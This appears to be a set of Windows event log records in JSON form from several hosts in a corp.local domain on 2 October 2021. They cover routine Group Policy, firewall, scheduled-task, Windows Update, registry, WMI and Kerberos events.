{"EventTime":"2021-10-02T17:23:43.892646+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":1129,"SourceName":"Microsoft-Windows-GroupPolicy","ProviderGuid":"{AEA1B4FA-97D1-45F2-A64C-4D69FFFD92C9}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56667,"ActivityID":"{042766DA-7079-4ED7-A643-06E16A42D4AC}","ExecutionProcessID":540,"ExecutionThreadID":5472,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has successfully processed. If you do not see a success message for several hours, then contact your administrator.","Opcode":"Info","SupportInfo1":"1","SupportInfo2":"2049","ProcessingMode":"0","ProcessingTimeInMilliseconds":"235","ErrorCode":"1222","ErrorDescription":"The network is not present or not started. ","EventReceivedTime":"2021-10-02T17:23:45.474251+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T11:35:42.313991+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4660,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12801,"OpcodeValue":0,"RecordNumber":18995189,"ExecutionProcessID":4,"ExecutionThreadID":7072,"Channel":"Security","Message":"An object was deleted.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT02$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nObject:\r\n\tObject Server:\tSecurity\r\n\tHandle ID:\t0x1d4\r\n\r\nProcess Information:\r\n\tProcess ID:\t0x1f2c\r\n\tProcess Name:\tC:\\Windows\\System32\\wevtutil.exe\r\n\tTransaction ID:\t{00000000-0000-0000-0000-000000000000}","Category":"Registry","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT02$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ObjectServer":"Security","HandleId":"0x1d4","ProcessId":"0x1f2c","ProcessName":"C:\\Windows\\System32\\wevtutil.exe","TransactionId":"{00000000-0000-0000-0000-000000000000}","EventReceivedTime":"2021-10-02T11:35:46.494159+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T17:13:30.250988+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4663,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12812,"OpcodeValue":0,"RecordNumber":896525,"ExecutionProcessID":4,"ExecutionThreadID":5876,"Channel":"Security","Message":"An attempt was made to access an object.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tACC01$\r\n\tAccount Domain:\t\tPROD\r\n\tLogon ID:\t\t0x3E7\r\n\r\nObject:\r\n\tObject Server:\t\tSecurity\r\n\tObject Type:\t\tFile\r\n\tObject Name:\t\t\\Device\\HarddiskVolume3\r\n\tHandle ID:\t\t0x17dc\r\n\tResource Attributes:\tS:\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x9b4\r\n\tProcess Name:\t\tC:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2011.6-0\\MsMpEng.exe\r\n\r\nAccess Request Information:\r\n\tAccesses:\t\tReadData (or ListDirectory)\r\n\t\t\t\t\r\n\tAccess Mask:\t\t0x1","Category":"Removable Storage","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"ACC01$","SubjectDomainName":"PROD","SubjectLogonId":"0x3e7","ObjectServer":"Security","ObjectType":"File","ObjectName":"\\Device\\HarddiskVolume3","HandleId":"0x17dc","AccessList":"%%4416\n\t\t\t\t","AccessMask":"0x1","ProcessId":"0x9b4","ProcessName":"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2011.6-0\\MsMpEng.exe","ResourceAttributes":"S:","EventReceivedTime":"2021-10-02T17:13:32.094570+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T11:35:45.873034+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4657,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12801,"OpcodeValue":0,"RecordNumber":18995193,"ExecutionProcessID":4,"ExecutionThreadID":3148,"Channel":"Security","Message":"A registry value was modified.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT02$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nObject:\r\n\tObject Name:\t\t\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\WMI\\Autologger\\EventLog-System\\{11cd958a-c507-4ef3-b3f2-5fd9dfbd2c78}\r\n\tObject Value Name:\tMatchAnyKeyword\r\n\tHandle ID:\t\t0x1fc\r\n\tOperation Type:\t\tExisting registry value modified\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x1868\r\n\tProcess Name:\t\tC:\\Windows\\System32\\wevtutil.exe\r\n\r\nChange Information:\r\n\tOld Value Type:\t\tREG_QWORD\r\n\tOld Value:\t\t0x8000000000000000\r\n\tNew Value Type:\t\tREG_QWORD\r\n\tNew Value:\t\t0xC000000000000000","Category":"Registry","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT02$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ObjectName":"\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\WMI\\Autologger\\EventLog-System\\{11cd958a-c507-4ef3-b3f2-5fd9dfbd2c78}","ObjectValueName":"MatchAnyKeyword","HandleId":"0x1fc","OperationType":"%%1905","OldValueType":"%%1883","OldValue":"0x8000000000000000","NewValueType":"%%1883","NewValue":"0xC000000000000000","ProcessId":"0x1868","ProcessName":"C:\\Windows\\System32\\wevtutil.exe","EventReceivedTime":"2021-10-02T11:35:47.536882+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T17:12:48.932759+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4946,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":896513,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":1524,"Channel":"Security","Message":"A change was made to the Windows Firewall exception list. A rule was added.\r\n\t\r\nProfile Changed:\tAll\r\n\r\nAdded Rule:\r\n\tRule ID:\t{A46D3672-7F06-4D39-8A6D-F1AC1DF3A2D1}\r\n\tRule Name:\tWinDefend Outbound for TCP","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","ProfileChanged":"All","RuleId":"{A46D3672-7F06-4D39-8A6D-F1AC1DF3A2D1}","RuleName":"WinDefend Outbound for TCP","EventReceivedTime":"2021-10-02T17:12:49.778527+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T17:12:48.916911+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223374235878031360","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2004,"SourceName":"Microsoft-Windows-Windows Firewall With Advanced Security","ProviderGuid":"{D1BC9AFF-2ABF-4D71-9146-ECB2A986EB85}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4831,"ExecutionProcessID":1732,"ExecutionThreadID":3968,"Channel":"Microsoft-Windows-Windows Firewall With Advanced Security/Firewall","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"A rule has been added to the Windows Defender Firewall exception list.\r\n\r\nAdded Rule:\r\n\tRule ID:\td60efa47-03cd-4c43-8d19-c4caae270a32\r\n\tRule Name:\tInbound service restriction rule for WinDefend\r\n\tOrigin:\tLocal\r\n\tActive:\tYes\r\n\tDirection:\tInbound\r\n\tProfiles:\tPrivate,Domain, Public\r\n\tAction:\tBlock\r\n\tApplication Path:\tC:\\ProgramData\\Microsoft\\Windows Defender\\platform\\4.18.2011.6-0\\MsMpEng.exe\r\n\tService Name:\tWinDefend\r\n\tProtocol:\tAny\r\n\tSecurity Options:\tNone\r\n\tEdge Traversal:\tNone\r\n\tModifying User:\tS-1-5-18\r\n\tModifying Application:\tC:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2011.6-0\\MsMpEng.exe","Opcode":"Info","RuleId":"d60efa47-03cd-4c43-8d19-c4caae270a32","RuleName":"Inbound service restriction rule for WinDefend","Origin":"1","ApplicationPath":"C:\\ProgramData\\Microsoft\\Windows Defender\\platform\\4.18.2011.6-0\\MsMpEng.exe","ServiceName":"WinDefend","Direction":"1","Protocol":"256","Action":"2","Profiles":"2147483647","LocalAddresses":"*","RemoteAddresses":"*","Flags":"1","Active":"1","EdgeTraversal":"0","LooseSourceMapped":"0","SecurityOptions":"0","ModifyingUser":"S-1-5-18","ModifyingApplication":"C:\\ProgramData\\Microsoft\\Windows 
Defender\\Platform\\4.18.2011.6-0\\MsMpEng.exe","SchemaVersion":"542","RuleStatus":"65536","LocalOnlyMapped":"0","EventReceivedTime":"2021-10-02T17:12:49.778527+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T17:12:48.879652+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223374235878031360","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2006,"SourceName":"Microsoft-Windows-Windows Firewall With Advanced Security","ProviderGuid":"{D1BC9AFF-2ABF-4D71-9146-ECB2A986EB85}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4829,"ExecutionProcessID":1732,"ExecutionThreadID":6784,"Channel":"Microsoft-Windows-Windows Firewall With Advanced Security/Firewall","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"A rule has been deleted in the Windows Defender Firewall exception list.\r\n\r\nDeleted Rule:\r\n\tRule ID:\ta9451017-7b7b-4b5d-8e01-e7eeca12fdab\r\n\tRule Name:\tInbound service restriction rule for WinDefend\r\n\tModifying User:\tS-1-5-18\r\n\tModifying Application:\tC:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2011.6-0\\MsMpEng.exe","Opcode":"Info","RuleId":"a9451017-7b7b-4b5d-8e01-e7eeca12fdab","RuleName":"Inbound service restriction rule for WinDefend","ModifyingUser":"S-1-5-18","ModifyingApplication":"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2011.6-0\\MsMpEng.exe","EventReceivedTime":"2021-10-02T17:12:49.778527+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T17:12:48.925751+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4948,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":896512,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":1524,"Channel":"Security","Message":"A change was made to the Windows Firewall exception list. A rule was deleted.\r\n\t\r\nProfile Changed:\tAll\r\n\r\nDeleted Rule:\r\n\tRule ID:\t{AF5FBDA2-BFD4-4140-8E75-FDE40ABCFBA1}\r\n\tRule Name:\tWinDefend Outbound for TCP","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","ProfileChanged":"All","RuleId":"{AF5FBDA2-BFD4-4140-8E75-FDE40ABCFBA1}","RuleName":"WinDefend Outbound for TCP","EventReceivedTime":"2021-10-02T17:12:49.778527+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T17:12:57.227169+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":5719,"SourceName":"NETLOGON","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56664,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"This computer was not able to set up a secure session with a domain controller in domain PROD due to the following: \r\nWe can't sign you in with this credential because your domain isn't available. Make sure your device is connected to your organization's network and try again. If you previously signed in on this device with another credential, you can sign in with that credential. \r\nThis may lead to authentication problems. Make sure that this computer is connected to the network. If the problem persists, please contact your domain administrator. \r\n\r\nADDITIONAL INFO \r\nIf this computer is a domain controller for the specified domain, it sets up the secure session to the primary domain controller emulator in the specified domain. Otherwise, this computer sets up the secure session to any domain controller in the specified domain.","Opcode":"Info","Data":"PROD","Data_1":"%%1311","EventData.Binary":"5E0000C0","EventReceivedTime":"2021-10-02T17:12:57.820781+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T08:37:48.529981+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4698,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12804,"OpcodeValue":0,"RecordNumber":4065304,"ActivityID":"{1861A8E2-AEB2-0000-61A9-6118B2AED701}","ExecutionProcessID":640,"ExecutionThreadID":1636,"Channel":"Security","Message":"A scheduled task was created.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nTask Information:\r\n\tTask Name: \t\t\\Microsoft\\Windows\\UpdateOrchestrator\\Universal Orchestrator Start\r\n\tTask Content: \t\t<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo>\r\n <URI>\\Microsoft\\Windows\\UpdateOrchestrator\\Universal Orchestrator Start</URI>\r\n <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;BA)</SecurityDescriptor>\r\n </RegistrationInfo>\r\n <Triggers>\r\n <TimeTrigger>\r\n <StartBoundary>2021-10-02T11:23:00.000Z</StartBoundary>\r\n <Enabled>true</Enabled>\r\n </TimeTrigger>\r\n </Triggers>\r\n <Settings>\r\n <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <Duration>PT10M</Duration>\r\n <WaitTimeout>PT1H</WaitTimeout>\r\n <StopOnIdleEnd>true</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n 
<RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n <Priority>7</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>%systemroot%\\system32\\usoclient.exe</Command>\r\n <Arguments>StartUWork</Arguments>\r\n </Exec>\r\n </Actions>\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <UserId>S-1-5-18</UserId>\r\n <RunLevel>LeastPrivilege</RunLevel>\r\n </Principal>\r\n </Principals>\r\n</Task>\r\n\r\nOther Information:\r\n\tProcessCreationTime: \t\t5066549580791828\r\n\tClientProcessId: \t\t\t356\r\n\tParentProcessId: \t\t\t604\r\n\tFQDN: \t\t0\r\n\t","Category":"Other Object Access Events","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","TaskName":"\\Microsoft\\Windows\\UpdateOrchestrator\\Universal Orchestrator Start","TaskContent":"<?xml version=\"1.0\" encoding=\"UTF-16\"?>\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\n <RegistrationInfo>\n <URI>\\Microsoft\\Windows\\UpdateOrchestrator\\Universal Orchestrator Start</URI>\n <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;BA)</SecurityDescriptor>\n </RegistrationInfo>\n <Triggers>\n <TimeTrigger>\n <StartBoundary>2021-10-02T11:23:00.000Z</StartBoundary>\n <Enabled>true</Enabled>\n </TimeTrigger>\n </Triggers>\n <Settings>\n <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\n <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\n <AllowHardTerminate>true</AllowHardTerminate>\n <StartWhenAvailable>false</StartWhenAvailable>\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\n <IdleSettings>\n <Duration>PT10M</Duration>\n <WaitTimeout>PT1H</WaitTimeout>\n <StopOnIdleEnd>true</StopOnIdleEnd>\n <RestartOnIdle>false</RestartOnIdle>\n </IdleSettings>\n <AllowStartOnDemand>true</AllowStartOnDemand>\n 
<Enabled>true</Enabled>\n <Hidden>false</Hidden>\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\n <WakeToRun>false</WakeToRun>\n <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\n <Priority>7</Priority>\n </Settings>\n <Actions Context=\"Author\">\n <Exec>\n <Command>%systemroot%\\system32\\usoclient.exe</Command>\n <Arguments>StartUWork</Arguments>\n </Exec>\n </Actions>\n <Principals>\n <Principal id=\"Author\">\n <UserId>S-1-5-18</UserId>\n <RunLevel>LeastPrivilege</RunLevel>\n </Principal>\n </Principals>\n</Task>","ClientProcessStartKey":"5066549580791828","ClientProcessId":"356","ParentProcessId":"604","RpcCallClientLocality":"0","FQDN":"IT01.corp.local","EventReceivedTime":"2021-10-02T08:37:50.444983+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T12:25:41.472058+05:45","Hostname":"IT01.corp.local","Keywords":"9223372036854784004","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":44,"SourceName":"Microsoft-Windows-WindowsUpdateClient","ProviderGuid":"{945A8954-C147-4ACD-923F-40C45405A658}","Version":1,"TaskValue":1,"OpcodeValue":12,"RecordNumber":26200,"ActivityID":"{1861A8E2-AEB2-0001-C704-6518B2AED701}","ExecutionProcessID":356,"ExecutionThreadID":3472,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Windows Update started downloading an update.","Category":"Windows Update Agent","Opcode":"Download","updateTitle":"Security Intelligence Update for Microsoft Defender Antivirus - KB2267602 (Version 1.349.1764.0)","updateGuid":"{ff308918-dc38-46af-b26b-84c0adffca8d}","updateRevisionNumber":"200","EventReceivedTime":"2021-10-02T12:25:43.418694+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T09:07:17.003217+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4664,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12800,"OpcodeValue":0,"RecordNumber":4066284,"ExecutionProcessID":4,"ExecutionThreadID":5956,"Channel":"Security","Message":"An attempt was made to create a hard link.\r\n\r\nSubject:\r\n\tAccount Name:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLink Information:\r\n\tFile Name:\tC:\\Program Files\\WindowsApps\\Microsoft.Windows.Photos_2021.21070.22007.0_x64__8wekyb3d8bbwe\\Assets\\VideoEditor\\contrast-white\\VideoEditorWideTile.scale-200_contrast-white.png\r\n\tLink Name:\tC:\\Program Files\\WindowsApps\\Microsoft.Windows.Photos_2021.21090.10007.0_neutral_split.scale-100_8wekyb3d8bbwe\\Assets\\VideoEditor\\contrast-white\\VideoEditorSplashScreen.scale-100_contrast-white.png\r\n\tTransaction ID:\t{00000000-0000-0000-0000-000000000000}","Category":"File System","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","FileName":"C:\\Program Files\\WindowsApps\\Microsoft.Windows.Photos_2021.21070.22007.0_x64__8wekyb3d8bbwe\\Assets\\VideoEditor\\contrast-white\\VideoEditorWideTile.scale-200_contrast-white.png","LinkName":"C:\\Program Files\\WindowsApps\\Microsoft.Windows.Photos_2021.21090.10007.0_neutral_split.scale-100_8wekyb3d8bbwe\\Assets\\VideoEditor\\contrast-white\\VideoEditorSplashScreen.scale-100_contrast-white.png","TransactionId":"{00000000-0000-0000-0000-000000000000}","EventReceivedTime":"2021-10-02T09:07:18.629682+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T09:09:00.973984+05:45","Hostname":"IT01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":16,"SourceName":"Microsoft-Windows-Kernel-General","ProviderGuid":"{A68CA8B7-004F-D7B6-A698-07E2DE0F1F5D}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":26195,"ExecutionProcessID":348,"ExecutionThreadID":6384,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The access history in hive \\??\\C:\\ProgramData\\Microsoft\\Windows\\AppRepository\\Packages\\Microsoft.Windows.Photos_2021.21090.10007.0_x64__8wekyb3d8bbwe\\ActivationStore.dat was cleared updating 0 keys and creating 0 modified pages.","Opcode":"Info","HiveNameLength":"142","HiveName":"\\??\\C:\\ProgramData\\Microsoft\\Windows\\AppRepository\\Packages\\Microsoft.Windows.Photos_2021.21090.10007.0_x64__8wekyb3d8bbwe\\ActivationStore.dat","KeysUpdated":"0","DirtyPages":"0","EventReceivedTime":"2021-10-02T09:09:02.921487+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T09:09:03.055334+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4699,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12804,"OpcodeValue":0,"RecordNumber":4066291,"ActivityID":"{1861A8E2-AEB2-0000-61A9-6118B2AED701}","ExecutionProcessID":640,"ExecutionThreadID":6332,"Channel":"Security","Message":"A scheduled task was deleted.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nTask Information:\r\n\tTask Name: \t\t\\Microsoft\\Windows\\UpdateOrchestrator\\Universal Orchestrator Start\r\n\tTask Content: \t\t\r\n\r\nOther Information:\r\n\tProcessCreationTime: \t\t5066549580791828\r\n\tClientProcessId: \t\t\t356\r\n\tParentProcessId: \t\t\t604\r\n\tFQDN: \t\t0\r\n\t","Category":"Other Object Access Events","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","TaskName":"\\Microsoft\\Windows\\UpdateOrchestrator\\Universal Orchestrator Start","ClientProcessStartKey":"5066549580791828","ClientProcessId":"356","ParentProcessId":"604","RpcCallClientLocality":"0","FQDN":"IT01.corp.local","EventReceivedTime":"2021-10-02T09:09:04.930427+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T14:44:25.708715+05:45","Hostname":"IT03.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":0,"SourceName":"gupdate","TaskValue":0,"RecordNumber":30291,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","ERROR_EVT_UNRESOLVED":true,"Message":"Service stopped","EventData":"<Data>Service stopped</Data>","EventReceivedTime":"2021-10-02T14:44:26.708752+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:58:54.124703+05:45","Hostname":"IT03.corp.local","Keywords":"4611686018427387904","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":5858,"SourceName":"Microsoft-Windows-WMI-Activity","ProviderGuid":"{1418EF04-B0B4-4623-BF7E-D74AB47BBDAA}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":20310,"ActivityID":"{C4CABCCB-A926-0001-EBB8-CCC426A9D701}","ExecutionProcessID":1904,"ExecutionThreadID":2744,"Channel":"Microsoft-Windows-WMI-Activity/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Id = {C4CABCCB-A926-0001-EBB8-CCC426A9D701}; ClientMachine = IT03; User = NT AUTHORITY\\SYSTEM; ClientProcessId = 3408; Component = Unknown; Operation = Start IWbemServices::ExecNotificationQuery - ROOT\\CIMV2 : SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName = 'wsmprovhost.exe'; ResultCode = 0x80041032; PossibleCause = Unknown","Opcode":"Info","UserData":"<Operation_ClientFailure xmlns='http://manifests.microsoft.com/win/2006/windows/WMI'><Id>{C4CABCCB-A926-0001-EBB8-CCC426A9D701}</Id><ClientMachine>IT03</ClientMachine><User>NT AUTHORITY\\SYSTEM</User><ClientProcessId>3408</ClientProcessId><Component>Unknown</Component><Operation>Start IWbemServices::ExecNotificationQuery - ROOT\\CIMV2 : SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName = 'wsmprovhost.exe'</Operation><ResultCode>0x80041032</ResultCode><PossibleCause>Unknown</PossibleCause></Operation_ClientFailure>","EventReceivedTime":"2021-10-02T18:58:55.737674+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:56:17.262480+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":14339,"OpcodeValue":0,"RecordNumber":190902186,"ExecutionProcessID":512,"ExecutionThreadID":4140,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tIT03$\r\n\tSupplied Realm Name:\tcorp.local\r\n\tUser ID:\t\t\tS-1-5-21-2569713578-3403938347-3732993993-1140\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::ffff:192.168.2.108\r\n\tClient Port:\t\t10586\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"IT03$","TargetDomainName":"corp.local","TargetSid":"S-1-5-21-2569713578-3403938347-3732993993-1140","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2569713578-3403938347-3732993993-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::ffff:192.168.2.108","IpPort":"10586","EventReceivedTime":"2021-10-02T18:56:19.012510+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
